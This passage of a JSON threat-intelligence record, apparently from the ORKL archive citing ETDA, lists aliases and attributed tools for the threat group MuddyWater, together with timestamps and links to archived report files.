			"updated_at": "2026-04-10T02:00:04.775749Z",
			"deleted_at": null,
			"main_name": "MuddyWater",
			"aliases": [
				"ATK 51",
				"Boggy Serpens",
				"Cobalt Ulster",
				"G0069",
				"ITG17",
				"Mango Sandstorm",
				"MuddyWater",
				"Operation BlackWater",
				"Operation Earth Vetala",
				"Operation Quicksand",
				"Seedworm",
				"Static Kitten",
				"T-APT-14",
				"TA450",
				"TEMP.Zagros",
				"Yellow Nix"
			],
			"source_name": "ETDA:MuddyWater",
			"tools": [
				"Agentemis",
				"BugSleep",
				"CLOUDSTATS",
				"ChromeCookiesView",
				"Cobalt Strike",
				"CobaltStrike",
				"CrackMapExec",
				"DCHSpy",
				"DELPHSTATS",
				"EmPyre",
				"EmpireProject",
				"FruityC2",
				"Koadic",
				"LOLBAS",
				"LOLBins",
				"LaZagne",
				"Living off the Land",
				"MZCookiesView",
				"Meterpreter",
				"Mimikatz",
				"MuddyC2Go",
				"MuddyRot",
				"Mudwater",
				"POWERSTATS",
				"PRB-Backdoor",
				"PhonyC2",
				"PowGoop",
				"PowerShell Empire",
				"PowerSploit",
				"Powermud",
				"QUADAGENT",
				"SHARPSTATS",
				"SSF",
				"Secure Socket Funneling",
				"Shootback",
				"Smbmap",
				"Valyria",
				"chrome-passwords",
				"cobeacon",
				"prb_backdoor"
			],
			"source_id": "ETDA",
			"reports": null
		}
	],
	"ts_created_at": 1775434393,
	"ts_updated_at": 1775792062,
	"ts_creation_date": 0,
	"ts_modification_date": 0,
	"files": {
		"pdf": "https://archive.orkl.eu/580f97ddec2872f618306b86bddd4896bd56fe2f.pdf",
		"text": "https://archive.orkl.eu/580f97ddec2872f618306b86bddd4896bd56fe2f.txt",
		"img": "https://archive.orkl.eu/580f97ddec2872f618306b86bddd4896bd56fe2f.jpg"
	}
}